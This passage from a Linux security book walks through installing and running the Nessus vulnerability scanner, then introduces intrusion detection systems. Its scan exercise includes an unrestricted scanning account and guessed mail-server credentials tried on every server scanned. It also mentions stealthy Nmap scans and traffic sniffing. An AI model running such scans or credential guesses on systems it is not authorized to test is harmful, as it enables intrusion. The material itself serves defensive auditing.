authenticate again using public key pairs. +Exercise: Installing Nessus and +Conducting a Vulnerability Scan +1. Install Nessus from a tarball or from an RPM using the instructions +given earlier. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 176 +176 Chapter 3 • System Scanning and Probing +NOTE +If you install from an RPM, you will not be able to conduct differential +and detached scans. If you install Nessus using tarball files, make sure +that you specify ./configure --enable-save-kb --enable-save-sessions +when you install the nessus-core files. +2. Log on locally to the system that will house the Nessus daemon. +3. Start Nessus using either of the following commands: +/etc/rc.d/init.d/nessus start +or (to manually run nessusd as a daemon): +/usr/sbin/nessusd -D +NOTE +When installing Nessus, if you see a message informing you that there +was an error in loading shared libraries, and that the libnasl.so.0 module +can’t be found, you have not modified the /etc/ld.so.conf file to contain +a reference to /usr/local/lib, and then run ldconfig. Even if you have, try it +again. If you wish to stop nessus, issue the following command: killall -9 +nessusd. +4. Issue the following command to create a local account that can administer +the system (you can,of course,specify any user or password you wish): +nessusd -P root,password +5. You now have established a username and password for a local user.Now, +create a username and password for your local system named nessus: +useradd nessus +passwd nessus +New UNIX password: +Retype UNIX password: +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 177 +System Scanning and Probing • Chapter 3 177 +This account is not used by nessusd.However,the nessus-adduser +program will sense that this account exists,which will make it easier for +you to allow remote clients to use this account. +6. Next,issue the following command: +/usr/sbin/nessus-adduser +7. When prompted for a username,enter remotenessus. +8. Indicate that you want to use the cipher authentication method (the +default) by simply pressing ENTER. +9. Nessus will ask you if the user you are adding is a local user.Indicate no +(the default) by entering n,and then press ENTER. +10. You will then be asked to provide the IP address for the source host.This +IP address should be of the client that will access the computer.If,for +example,you are going to access this system from a remote host with the +IP address of 10.100.100.1,enter 10.100.100.1,then press ENTER.Note: +If you have only one Linux system,enter the IP address of that system. +11. Nessus will then ask you for a one-time password for this user.This pass- +word is important,because nessusd and the Nessus client will use this pass- +word once to initiate the public key exchange.Once this password is used, +it will be discarded in favor of the public keys.Make sure you remember +this password.Once you have entered this password,press ENTER. +12. Nessus will then ask you to enter rules for the remotenessus user.These +rules determine exactly which networks and hosts this user will be able +to scan.If you leave the rule empty,then no limitations will be applied, +and this user account will be able to scan all systems.Leave this rule +blank for this user,and press CTRL + D. +13. You will be given a chance to review the settings for remotenessus user.If +they are acceptable,enter y to the question “Is that OK?”and press +ENTER. +14. Once you have added this user,you will receive a “user added”message. +If you see any other message,you must add this user again.The chief +reason for errors is the failure to use useradd and passwd to add the user +to the Linux database.To confirm that you have added this user,enter +the following command: +/usr/sbin/nessusd -L +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 178 +178 Chapter 3 • System Scanning and Probing +15. Notice that you can see the remotenessus account you just added.It cur- +rently says that the account is based on a user password,rather than a +user key.Notice also that it reads remotenessus@x.x.x.x.This means that +remotenessus can only be used by that specific IP address.Understand +that if the IP address is not the same as the system you are trying to use +as a client,you will not be able to connect.Make sure that this account +has the proper IP address of the system you will use as a client. +16. Open a nessus client on the machine with the IP address you listed in +step 8.If,for example,you wish to use the Linux nessus client,you +would enter the following at a command prompt:nessus &. +17. You will be prompted to create a password to protect the client against +unauthorized use.Enter a password and confirm it,and then you will see +the Nessus client main window.You are not currently logged in. +18. Prepare to log in to the remote nessus server.In the Nessus host tab, +enter the name or IP address of the host running nessusd.In the Port +window,make sure it reads 1241,because you are connecting to a newer +server.In the Login field,enter remotenessus and click Log In. +19. You will be connected.The best way to tell that you are connected is +that the Plug-ins window will appear automatically.If the client hangs +after a minute or so,you have failed authentication.Once you are con- +nected,go back to your server and issue the /usr/sbin/nessusd -L +command again to view the key for the remotenessus user.You will +notice that this user now has a user key entry.From now on,you will +authenticate using public keys,rather than sending passwords across the +network. +20. Now,use your Nessus client to conduct a remote scan.Select Enable +All But Dangerous Plug-Ins,and then select the Prefs tab.Scroll +down until you see the Nmap section.Choose the options you feel are +appropriate for your situation,and then scroll down further to the FTP +login account entries.Enter anonymous and an e-mail address here. +21. Scroll down further until you see the imap and POP3 valid account +entries.Enter a username and password for each account.Make good +guesses,as these will be used on every e-mail server you scan. +22. Click on the Target Selection tab and enter a remote server.Make +sure that this server is not a critical server,and that you have authoriza- +tion to scan these servers. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 179 +System Scanning and Probing • Chapter 3 179 +23. Once you have entered this server’s host name or IP address,click Start +The Scan. +24. Nessus will show you a progress screen,similar to that shown in +Figure 3.31. +Figure 3.31 Nessus Scanning a System +25. After some time,the scan will finish.Depending on the nature of the +host you have scanned,you will receive a detailed report explaining +what Nessus has found.The report includes a description of the +problem,a determination of the severity of the problem,and advice on +how to fix it. +Updating Nessus +As with antivirus or IP fingerprinting programs,a scanner is only as good as its +database of vulnerabilities.If the Nessus database could never be updated,the +application would be worse than useless,because the old information would lull +you into a false sense of security.Fortunately,the Nessus project has been quite +active,and it has a good record for providing regular plug-in updates.Some of +the plug-ins are written by Nessus developers;however,the majority are donated +by Nessus users. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 180 +180 Chapter 3 • System Scanning and Probing +The most efficient way to update your Nessus daemon is to issue the fol- +lowing command as long as you have Nessus 1.0 or later: +nessus-update-plugins +If you wish to update your Nessus plug-ins manually,follow these steps: +1. Go to www.nessus.org and find the downloads page (as of this writing, +www.nessus.org/plugins). +2. Download the plug-ins.Usually,you can download all of the plug-ins,or +choose to download only certain plug-ins that interest you. +3. Copy any and all plug-ins to the following directory.The default direc- +tory is /usr/local/lib/nessus/plugins/.It is possible that you have speci- +fied a different directory in the /etc/nessus/nessus.conf file. +4. Restart nessus.You can do this by using its system V script +(/etc/rc.d/init.d/nessus start),or by finding the daemon’s PID,and then +issuing the kill -HUP command. +Understanding Differential, +Detached, and Continuous Scans +Earlier,you learned about options to specify when compiling the nessus-core +files.These options,--enable-save-kb and --enable-save-sessions,allow the +Nessus client and server to communicate in a more sophisticated way.Specifically, +the compilation option allows the client to “remember”past sessions and to con- +figure a nessus daemon to conduct a scan all by itself.These capabilities are +respectively called differential and detached scanning.The ability to save sessions +allows you to begin sessions that have been interrupted.All of these features will +be enabled by default in later versions of Nessus;for now,you must compile +them yourself. +A differential scan is where Nessus can compare its current scan to past scan +results and then provide you with a short list of changes.From this list,you can +identify what daemons have been updated,shut down,or turned on.The two +benefits of a differential scan are that you can quickly identify changes in a net- +work host,and you will not have to generate as much network traffic.The +--enable-save-kb option creates,among other things,an additional tab,KB, +in the Nessus client.Figure 3.32 shows the KB tab. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 181 +System Scanning and Probing • Chapter 3 181 +Figure 3.32 Configuring Nessus to Do a Differential Scan in the KB Tab +A detached scan allows you to use your client to attach to the Nessus +daemon,request a scan,and then disconnect.Normally,if this were to happen, +nessusd would cancel the scan.However,if you have enabled the --enable-save- +kb feature,the scan will continue,and nessusd will then e-mail you the results of +the scan.You can also use this feature to have Nessus conduct a new scan after a +certain number of hours have passed.Figure 3.33 shows how to configure a +properly configured client and server to conduct a detached scan.It is vital that +you enter a valid e-mail address;because you will end communication with the +server before the scan completes,you will not be able to view the results any +other way. +You have likely noticed the Continuous scan option.This allows you to +repeat a scan multiple times.You can set the delay between two scans in seconds. +Thus,to set a scan to happen daily,you could choose the Continuous scan +option,and then specify the value of 28800 (eight hours),or 144000 (five days). +For more information about KB saving,consult the following URL:www +.nessus.org/doc/kb_saving.html. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 182 +182 Chapter 3 • System Scanning and Probing +Figure 3.33 Configuring the Nessus Client for a Detached Scan +SECURITY ALERT! +Improper use of detached and differential scans can seriously impact +host and network performance. Be very careful when configuring these +options, or you may inadvertently conduct a DoS attack against your +own network. +Exercise: Conducting Detached +and Differential Scans with Nessus +1. Make sure that the sendmail daemon is started: +/etc/rc.d /init.d/sendmail start +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 183 +System Scanning and Probing • Chapter 3 183 +2. Make sure that sendmail is in your path.If you are using the BASH +shell,issue the following command: +echo $PATH +lots of output :/usr/sbin/ +Another way to do this is to just type which sendmail and +examine the full path to the executable.That path should be in the +output of the echo $PATH command. +3. If sendmail is not in your path,enter the following: +PATH=$PATH:/usr/sbin +4. Now,open your Linux nessus client. +5. Log in to your nessus daemon. +NOTE +Make sure the nessus daemon is compiled to allow detached scans. +Use the /usr/local/sbin/nessusd-d command to learn more about the +daemon’s configuration. +6. In the Linux Nessus client,select the plug-ins that you want to use. +Configure any plug-ins as necessary. +7. Click on the Scan options tab,and select both the Optimize the test +and Detached scan options.You will have to acknowledge that these +scans can be dangerous. +8. Enter an e-mail address you can readily check in the Send results to +this email address section. +9. When you have verified all settings,click Start The Scan.After some +time,you will receive an e-mail report concerning the scan.If you +receive no e-mail report,then the scan did not find any vulnerabilities. +10. Now,you are ready to do a differential scan.First,conduct a full scan of +a host. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 184 +184 Chapter 3 • System Scanning and Probing +11. Once this scan has completed,click on the KB tab and select the +Enable KB saving,Reuse the knowledge bases about all the +hosts for the test,and Only show differences with the previous +scan buttons. +12. Conduct your scan of the same host again. +13. The scan will not execute any new commands,because you have effec- +tively told Nessus to skip these tests,because you already know about +the weaknesses.Now,if you update Nessus and it receives additional +plug-ins,only these plug-ins will be used for future scans.Be careful, +however,with this setting.If you leave it enabled,Nessus will not con- +duct these scans on this host,which could lead you into a false sense of +security. +14. Disable KB saving for now. +15. To enable continuous scans,prepare your scan,and then select the Scan +options tab.Select the Continuous scan button,and then enter an +appropriate value,such as 201600 for a weekly scan (every seven days). +Next,begin your scan.The initial scan will begin and (eventually) finish, +and then it will begin again automatically in seven days,if nessusd is still +running and available. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 185 +System Scanning and Probing • Chapter 3 185 +Summary +In this chapter,you learned how to scan your operating system for viruses.You +then learned more about how to stop DDoS attacks.Although applications such +as Zombie Zapper are not foolproof,they can still help you prepare against such +attacks.You should remain current about DDoS attacks and learn more about +related tools that can help you recover from this type of security breach.This way, +if a system is compromised,you can recover from the event in a graceful way, +rather than simply shutting down your system. +You then learned how to scan your system’s ports using tools such as Gnome +Service Scan and Nmap.The latter program is somewhat more sophisticated,in +that it allows you to learn the version of the operating system you are using,the +open ports,and the system’s TCP sequencing abilities.Nmap is an important tool +to understand,because it is used in many other applications,including Cheops +and Nessus. +Although not specifically a security application,Cheops enables you to mon- +itor systems on your network,and provides a graphical map.This map is func- +tional,in that you can then right-click on host icons to access these services. +Finally,you learned how to use Nessus,a powerful vulnerability scanning tool. +Nessus provides you with the ability to update its configuration,and is able to +conduct detailed tests of any host on your network. +You now have a thorough understanding of the tools required to lock down +and test your system’s services.In the next chapter,you will learn more about +how to enhance host and network logging so that you can discover if your +system has been compromised. +Solutions Fast Track +Scanning for Viruses Using the +AntiVir Antivirus Application +(cid:59) Virus scanners will perform the following tasks:check the system’s boot +record;search directories and subdirectories;automatically delete +infected files;save scans into a log file;use an internal scheduler,or an +external scheduler,such as at or cron;scan NFS-mounted drives;delete +infected files;and move infected files to a central,“quarantine”area of +your own choosing. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 186 +186 Chapter 3 • System Scanning and Probing +(cid:59) The AntiVir for Servers binary is a truly impressive command-line virus +scanner sold by H+BDEV.It is capable of searching for and deleting +macro viruses,boot sector viruses,e-mail viruses,and DDoS daemons. +(cid:59) An antivirus application is only as useful as its virus definition file.Your +application should provide you with frequent updates. +Scanning Systems for DDoS Attack +Software Using a Zombie Zapper +(cid:59) Attackers wage denial of service (DoS) attacks by first finding and +hacking into insecure systems on the Internet.Then,they install pro- +grams such as Tribe Flood Network 2000 (Tfn2k),stacheldraht,and +others.The compromised systems now have illicit programs installed on +them called zombies. +(cid:59) Once a zombie is commanded to attack a victim,it will generally con- +tinue the attack until it is forced to stop.If you notice large amounts of +unknown traffic when you monitor your network or network perimeter, +you can use a zombie zapper against the host or hosts generating this +traffic. +(cid:59) Limitations of a zombie zapper can include the following:they are pro- +grammed to shut down only certain DDoS servers;it may be blocked by +a firewall;the malicious user may have changed the password of the +illicit server;or the attack server may have spoofed packets. +Scanning System Ports Using the +Gnome Service Scan Port Scanner +(cid:59) Systems administrators find port scanners useful when auditing their +own systems.Although a simple port scanner such as GSS does not actu- +ally test for flaws in binaries and Web applications,a good port scanner +can help you isolate which ports are open,and then take any action that +is necessary. +(cid:59) Port scanning a machine may set off an alarm for the system’s adminis- +trator,who might take a dim view of your actions.Unless you have +explicit (sometimes,even written) permission from the system adminis- +trator,you may cause a serious violation of your security policy. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 187 +System Scanning and Probing • Chapter 3 187 +Using Nmap +(cid:59) Nmap is an advanced Unix-based port scanner.It can be used to audit +your network,test your router and switch configurations,test your fire- +wall configurations,and identify the nature of suspicious remote systems. +(cid:59) You can use Nmap as a basic port scanner for a system on your internal +network,or you can have it identify the operating system version of a +remote system on another firewall-protected network.Nmap is capable +of manipulating aspects of TCP to hide its scans from firewalls. +(cid:59) Nmap’s “interactive mode”allows you to do two things that you should +be aware of as a systems administrator:It can conduct multiple Nmap +sessions,and it can disguise the fact that it is running on your system. +Using Nmapfe as a Graphical Front End +(cid:59) The Nmap Front End (NmapFE) provides a well-written,stable GUI +that allows you to control almost every aspect of Nmap. +(cid:59) Note that this interface is somewhat unstable,and given to faults that +lead to complete crashes (core dumps).This is especially the case in sys- +tems that have been upgraded (say,from Red Hat version 7.0 to 7.1). +Using Remote Nmap as a Central Scanning Device +(cid:59) Remote Nmap (Rnmap) enables a client system to connect to a central +Nmap server.It is currently in beta,but both the client and the server +are quite strong. +(cid:59) Rnmap has the following features:user authentication,a command-line +and GUI client,and available encryption (still in beta form).Rnmap is +written in the Python scripting language,which means that your Linux +system must have Python installed. +Deploying Cheops to Monitor Your Network +(cid:59) Billed as a graphical network neighborhood,Cheops is related to appli- +cations such as HP OpenView.Both Cheops and HP OpenView allow +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 188 +188 Chapter 3 • System Scanning and Probing +you to create a graphical map of the network,and then manage any host +on that map.Although Cheops is not nearly as sophisticated,it still +allows you to quickly learn which hosts are up on a particular network +segment. +(cid:59) Cheops issues network broadcasts,and then processes these replies to dis- +cover remote hosts.Some older versions of Cheops use an application +called Queso to read the replies of remote systems.Queso is similar to +Nmap,although not as sophisticated or as recent.As with Nmap,Queso +does use stack fingerprinting to guess the operating system of a remote +server. +(cid:59) Cheops is capable of two types of monitoring.First,it can have your +Linux system issue simple ping requests to see if a remote host is up. +Second,instead of relying on a crude ping request,Cheops allows you to +pick a specific service offered by the remote host. +Deploying Nessus to Test Daemon Security +(cid:59) Using vulnerability detection software,you can find out exactly what +specific application is listening on that port.A good hacker is well +informed concerning the popular servers on the Internet,and can +quickly take advantage of a specific daemon that has a security problem. +Nessus allows you to proactively scan your system to determine its +weaknesses. +(cid:59) The Nessus client allows you to connect to the Nessus daemon,which +is usually on a remote server.Several different clients exist,including +those for Windows,Macintosh,and Unix/Linux systems. +(cid:59) The Nessus project has been quite active,and has a good record for pro- +viding regular plug-in updates. +(cid:59) When you launch the client for the first time,it will take some time to +create a public key pair,which will be used to authenticate with any +Nessus daemon. +(cid:59) The compilation option allows the client to “remember”past sessions and +to configure a nessus daemon to conduct a scan all by itself.These capabil- +ities are respectively called differential and detached scanning.The ability to +save sessions allows you to begin sessions that have been interrupted. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 189 +System Scanning and Probing • Chapter 3 189 +Frequently Asked Questions +The following Frequently Asked Questions, answered by the authors of this book, +are designed to both measure your understanding of the concepts presented in +this chapter and to assist you with real-life implementation of these concepts. To +have your questions about this chapter answered by the author, browse to +www.syngress.com/solutions and click on the “Ask the Author” form. +Q: I have downloaded and compiled AntiVir.However,it says that I am running +in “non-key mode,”and won’t allow me to scan any subdirectories off the +/directory.Why not? +A: You need to obtain the license key from www.hbedv.com.You can either +purchase a license,or use the private license,if you are qualified.Once you +obtain this key,rerun AntiVir.You will see that the “non-key mode”message +no longer appears.This key will also allow you to obtain an update every two +months.If you do not want to obtain a license,you can still scan each subdi- +rectory manually. +Q: Although I can compile and configure TkAntivir,I can’t seem to get it to +run.I was able to start it,and saw the “splash screen,”but then I saw nothing. +What is wrong? +A: Some window manager environments do not support TkAntivir well.Try +running TkAntivir in Gnome or KDE.In addition,you need to have suffi- +cient resolution (at least 800 x 600) in order for TkAntivir to run. +Q: The configuration script for TkAntivir crashes every time I run it.What +can I do? +A: Make sure that you have the correct libraries and resolution for the program. +See the instructions earlier in this chapter,as well as information at the +TkAntivir site (www.geiges.de/tkantivir).If your system supports RPM files, +try using RPM instead. +Q: Is it legal for me to scan other people’s systems using Gnome Service Scan +or Nmap? +A: While legal issues are rather complex,it is never acceptable to scan systems +that are not your own.You should scan only those systems for which you are +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 190 +190 Chapter 3 • System Scanning and Probing +directly responsible.You can also scan any system if you have been given +explicit permission to do so. +Q: When using Rnmap,I keep getting an “Access is denied message.”Why? +A: You must add a user using the ./rnmap-adduser command.You can receive +this message only if Rnmap is running.Otherwise,you would receive a +“Can’t connect to remote host”message.A common mistake is to assume that +the GUI interface will remember the password.This is not the case,and you +will have to re-enter the password each time you want to connect to the +remote Rnmap server. +Q: I want to enable KB saving sessions for Nessus,but I can’t see the KB tab. +Which client has this tab? +A: You must manually compile KB and session-saving support.If you installed +Nessus using an RPM,these features are not enabled. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 191 +Chapter 4 +Implementing an +Intrusion Detection +System +Solutions in this chapter: +(cid:2) Understanding IDS Strategies and Types +(cid:2) Installing Tripwire to Detect File Changes +(cid:2) Updating Tripwire to Account for +Legitimate Changes in the OS +(cid:2) Configuring Tripwire to Inform You +Concerning Changes +(cid:2) Deploying PortSentry to Act as a Host- +Based IDS +(cid:2) Configuring PortSentry to Block Users +(cid:2) Optimizing PortSentry to Sense +Attack Types +(cid:2) Installing and Configuring Snort +(cid:2) Running Snort as a Network-Based IDS +(cid:2) Configuring Snort to Log to a Database +(cid:2) Identifying Snort Add-Ons +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +191 + +138_linux_04 6/20/01 9:38 AM Page 192 +192 Chapter 4 • Implementing an Intrusion Detection System +Introduction +Perhaps the best way to ensure system security is to have your system or network +report certain changes to you.In this chapter,you will learn more about open +source intrusion detection tools that can help you detect activity at the system +and network level. +Chances are,your home or place of work has an alarm system.A home alarm +is an intrusion detection device.Generally a system device at your home—or at +your place of work or in your car—will do the following: +(cid:2) Accept programming to work reliably when you are away. +(cid:2) Actively monitor the likely break-in points. +(cid:2) Use motion sensors to aid in monitoring an empty home. +(cid:2) Detect an unwanted intruder. +(cid:2) Send an alert to you or a trusted third party in case of an event. +In regards to computing,an Intrusion Detection System (IDS) is any system or +set of systems that has the ability to detect a change in the status of your system +or network.An IDS can then send you alerts or take appropriate predefined +actions to help you protect your network.In the introduction to this book,you +learned that an IDS auditing station can monitor traffic.An IDS can be something +as simple as a network host using a simple application,such as Tcpdump,to learn +about the condition of a network,or it can be a more complex system that uses +multiple hosts to help capture,process,and analyze traffic.Because an IDS can +contain multiple hosts and applications,this chapter often uses the term IDS +application to refer to a specific IDS element.Generally,an IDS will have the +following five elements: +(cid:2) An information gathering device One of the IDS elements must +have the ability to capture data.For example,it must be able to detect +changes on a hard drive,capture network packets,or read open system +files. +(cid:2) An internal process monitoring mechanism The IDS should have +the ability to monitor itself and conduct self checks so that it can inform +you (or a person you designate) that it is working properly.For example, +Tripwire can warn you about a problem by using cron to alert you that +the database is missing.An IDS such as Snort can inform you about +problems by sending messages to the /var/log/messages file. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 193 +Implementing an Intrusion Detection System • Chapter 4 193 +(cid:2) Information storage capability The IDS must be able to store the +network packet information it obtains in a carefully organized way that +allows you to store data in an organized manner. +(cid:2) A command and control device The IDS must provide a way for +you to easily control its behavior. +(cid:2) An analysis device The IDS should provide you with the ability to +search your organized data store using queries and/or applications. +You will see in the following sections how each of these IDS elements is +implemented. +Tools & Traps… +False Alarms +If your car alarm system is like most others, it sometimes goes off +because it mistakes legitimate activity for a break-in. And, the alarm will +usually go off at the most inconvenient time possible. Especially at first, +you will find that your IDS will mistake legitimate activity for an attack. +Whenever an IDS triggers an alert by mistake, it is said to have gener- +ated a false positive. Generally, a false positive is caused by any one (or +more) of the following: +(cid:2) The IDS application has been improperly configured so that it +reacts to legitimate traffic. +(cid:2) The type of network traffic has changed, and the IDS is +unaware of the change. +(cid:2) You need to update the IDS application. Sometimes an +update means that you have to edit the configuration file. In +other cases, you will need to download new plug-ins and +files so that the IDS application is able to cope with new +types of network data or new signatures. +(cid:2) It is the nature of the beast. Sometimes, an IDS application +just won’t be as reliable as you’d like. It is the nature of most +IDS applications to make mistakes, because IDS applications +are just barely leaving their infancy. Even the most costly and +perfectly marketed IDS is bound to generate false positives; +Continued +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 194 +194 Chapter 4 • Implementing an Intrusion Detection System +this problem has nothing to do with the nature of open +source applications. +So, as you go about installing IDS applications, you will at first be +very pleased that you are logging anything at all. You will be excited that +you are receiving alerts about internet Control Message Protocol (ICMP) +packets and User Datagram Protocol (UDP) echoes. After a while, how- +ever, you will find yourself hoping that you can make all of this infor- +mation cohere into something useful. At this point, you will begin to tell +a true alert from a false positive. +Understanding IDS Strategies and Types +Two general strategies are used when it comes to detecting intrusions: +(cid:2) Rule-based IDS applications (also called signature-based) This is +the most common type of IDS,mainly because it is easier to install.After +you are able to get the IDS to load all of the signatures properly,you are +on your way to establishing an effective IDS.The challenge in regards to +a signature-based IDS is making sure that the rules remain current. +Similar to an anti-virus application,if you have old signatures,the IDS +will not capture and react to the latest attacks. +(cid:2) Anomaly-based IDS applications This type of IDS first spends time +gathering a sample of baseline (acceptable) network activity.The IDS +stores this information in a database,then responds to traffic that falls +outside the accepted baseline of activity.This type of IDS application is +generally more challenging to configure,because it is rather difficult to +determine exactly what “acceptable”and “normal”is,in regards to net- +work traffic. +Rule-based IDS applications sometimes rely upon the terms rule and signature, +which are used interchangeably.Traditionally,the term signature refers to an actual +attack that has been identified.Any time,for example,that a port scan occurs,the +fact that a number of ports have been scanned in a short period of time com- +prises a signature.A rule,on the other hand,is the piece of code that you use to +inform your IDS application about a specific signature.Therefore,a rule enables +an IDS to recognize an attack,log it,then send out alerts and/or reconfigure +operating system or firewall parameters. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 195 +Implementing an Intrusion Detection System • Chapter 4 195 +IDS applications do their work either continuously in “real-time,”or at cer- +tain intervals.Real-time intrusion detection is often useful in the following cases: +(cid:2) You are using a host-based IDS application,and you wish to supplement +your host’s security. +(cid:2) Your network has had a history of attacks,and you wish to use your net- +work-based IDS application to trace and/or stop them. +(cid:2) You have systems that are capable of logging large amounts of traffic. +(cid:2) You have the time to check all of the logs generated by the IDS. +Continuous intrusion detection may seem to be the only real option,but this +is not always the case.This strategy can often provide too much information,and +so you may want to enact interval-based intrusion detection.Possible times to acti- +vate your IDS may include: +(cid:2) Any time when you are not able to monitor traffic,such as after your +regularly scheduled work times and during weekends and holidays. +(cid:2) At random times during the regular workday.This strategy reduces the +amount of log files,yet also gives you an idea of what is happening on +your network. +You may also wish to have your IDS application generate new log files after a +certain period of time.For example,if you are logging to a database,have the +IDS archive its log files and begin a new log file.This way,you can search +through a manageable 2MB log file,as opposed to a monstrous 2GB file. +IDS Types +Although there are many different IDS application vendors,two different types of +IDS applications exist: +(cid:2) Host-based An IDS application that either scans system logs and open +network connections,or that scans the hard disk and then alerts you if +an event occurs. +(cid:2) Network-based An IDS application that listens for traffic as it passes +across the network. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 196 +196 Chapter 4 • Implementing an Intrusion Detection System +Host-Based IDS Applications +As you might suspect,a host-based IDS application resides on a single network +host and then monitors activity specific to that one host.All host-based IDS +applications run as daemons.Two types of host-based IDS applications exist: +(cid:2) Log analyzers +(cid:2) System drive analyzers +Log analysis IDS applications generally run as daemons and scan log files in +real time.They search for open network connections,and/or monitor the ports +on your system.Each time a port is opened,the log analysis IDS application will +then listen in to find out what is happening on these ports. +System drive analyzers scan a system’s hard drives and other peripherals +(removable drives,tape drives,print devices,and so forth) and then create a +database.This database contains a record of the “original”condition of the +system’s hard drives,for example.Then,whenever the drive analyzer detects a +change,it can take action by,for example,logging the change or sending an alert. +All host-based IDS applications require some sort of policy file that deter- +mines the behavior of the application. +Network-Based IDS Applications +Network-based applications operate at the application through network layers of +the Open Systems Interconnection Reference Model (OSI/RM).They have +become quite popular,because it is generally considered that they are the easiest +to configure,and most network administrators simply like being able to look at +all of the network packets as they cross the network.However,after the novelty +of seeing the packets wears off,more-seasoned professionals realize that network- +based IDS applications tend to generate a great deal of traffic,which few people +take the time to properly analyze.Still,network-based IDS applications are +extremely helpful when you wish to analyze network traffic. +Although not necessary,using several different hosts when creating a net- +work-based IDS application is often wise.The use of multiple hosts can help +ensure that you have enough processing power and storage space to properly cap- +ture,store,and analyze traffic.Figure 4.1 shows how a network IDS can break up +these duties among several different systems on the network. +The network IDS shown in Figure 4.1 greatly simplifies the flow of informa- +tion in a network-based IDS.As network traffic is generated,the sensor pulls the +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 197 +Implementing an Intrusion Detection System • Chapter 4 197 +packets into the host.Then,the Monitor and Storage host pulls the file that con- +tains the packets from the sensor.The Analyzer/Control station can then either +read the packets where they are stored,or it can actually pull selected log files +from the Monitor and Storage station. +Figure 4.1 A Sample Intrusion Detection System +Internet +Firewall +Network Host Network Host +Sensor +Router +Network Traffic +Monitor and Storage +Network Host Network Host +Analyzer/Control +Station +IDS Applications and Fault Tolerance +You may be asking yourself why anyone would use so many systems just to +implement an IDS.It is important that your IDS does not have a single point of +failure.The use of redundant systems provides fault tolerance and enhanced per- +formance.In regards to fault tolerance,a dedicated system—such as an IDS +sensor—will generally fail less often than a system responsible for multiple +responsibilities,such as a single system that is responsible for monitoring,storage, +and analysis.The principle that applies to computing also applies to mechanical +devices,such as engines:The more moving parts you have,the greater the chance +that one of these parts will fail.When it comes to computing,distributing tasks +among several different machines actually reduces the chance of a problem. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 198 +198 Chapter 4 • Implementing an Intrusion Detection System +Distributing tasks ensures that if one element fails,then your IDS has not +been completely shut down.For example,should the Analyzer/Control station +fail,intrusion detection will still occur,because the sensor can still grab packets.If +the Monitor and Storage station fails,the IDS will still be able to gather the +information.Fixes can be made quickly,and you can concentrate on only one +element of the broken IDS,rather than trying to figure out exactly which ele- +ment has failed. +The information can stay on the Monitor and Storage device,or it can be +brought to the Analyzer/Control station.The Monitor and Storage device may +have all log files ready to be served up via a Web server.The Analyzer/Control +station may be nothing more than a simple Linux host using a Web browser.The +administrator at the Analyzer/Control station can then use a Web browser to +access the Monitor and Storage device’s Web server.Also,network administrators +commonly use a program such as Secure Shell (SSH) to open a terminal-based +connection and then query the database or log files directly. +Of course,dividing tasks even further between hosts is possible,or simply +making one host responsible for all tasks.Ultimately,your management team is +responsible for determining the needs for your network.As far as performance is +concerned,consider that in many cases,an effective IDS application requires a +great deal of processor time in order to work well.Log files require a great deal of +hard drive space,especially in busy networks.Thus,simply for the sake of perfor- +mance,consider using multiple systems to gather,store,and analyze information. +NOTE +Whenever you transfer information between different hosts, make sure +that this information is encrypted and authenticated. If you do not do +so, a malicious user may be able to “sniff” the network and gather sensi- +tive information about your network. Information can include the pass- +words used to access systems, as well as the actual log files themselves. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 199 +Implementing an Intrusion Detection System • Chapter 4 199 +Damage & Defense… +IDS Implementation +Three factors will determine your ability to implement an IDS: +(cid:2) Security policy The very first thing that you should imple- +ment is a comprehensive security policy. Your security policy +is the first tool necessary to implement any security measure. +(cid:2) Cost Although an open source IDS can be very cost effective, +you may not have enough resources available to implement a +multiple-host IDS. +(cid:2) Support staff Make sure that you have enough people to +properly implement, maintain, and analyze the IDS you wish +to implement. It is rather common for an IDS application to +log activity, only to have the systems administrators ignore +this information because they are too busy to read the logs. +NOTE +Most network-based IDS applications do not work properly in a switched +network. Many systems administrators have voiced frustration that their +IDSs don’t work properly, only to learn that the reason is that the net- +work uses virtual LANS (vlans), which do not broadcast traffic, as does a +standard hub-based Ethernet network. You have several options, listed +here in order of preference: +(cid:2) Configure your network switch to allow one port to monitor all +traffic, then plug your host into this monitor port. +(cid:2) Find a location between the switch and the router, and plug in a +standard hub. +(cid:2) Obtain a network-based IDS, such as Ettercap (http://ettercap +.sourceforge.net), that helps sniff traffic in switched networks. +The best option is to configure your switch so that it will monitor all +traffic. Introducing a new piece of hardware can increase network +latency and even introduce security problems, if you do not enforce +sufficient physical security. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 200 +200 Chapter 4 • Implementing an Intrusion Detection System +What Can an IDS Do for Me? +Thus far,you have learned about IDS responsibilities in a general way.An IDS +can provide the services presented in Table 4.1. +Table 4.1 Services Provided by an IDS +Service Description +Traffic identification An IDS application must always accurately identify +the nature of the break-in or the nature of the +traffic, including source and destination ports and +addresses. +Logging enhancement Most IDS applications require that you establish +and threshold limits. After a limit (threshold) has been exceeded, +enforcement the IDS application will then send alerts and/or log +behavior. An IDS generally extends your logging +capability by placing additional information into a +log file or into a database. +Alerting An IDS often has the ability to send alert messages +to the network administrator or responsible party. +System reconfiguration Many IDS applications provide you with the ability +to reconfigure the operating system or a firewall +in case of an attack. For example, PortSentry has +the ability to automatically update the +/etc/hosts.deny file and effectively deny access to +any services offered by xinetd. +Drive verification This offers the ability to take a snapshot of the +network or operating 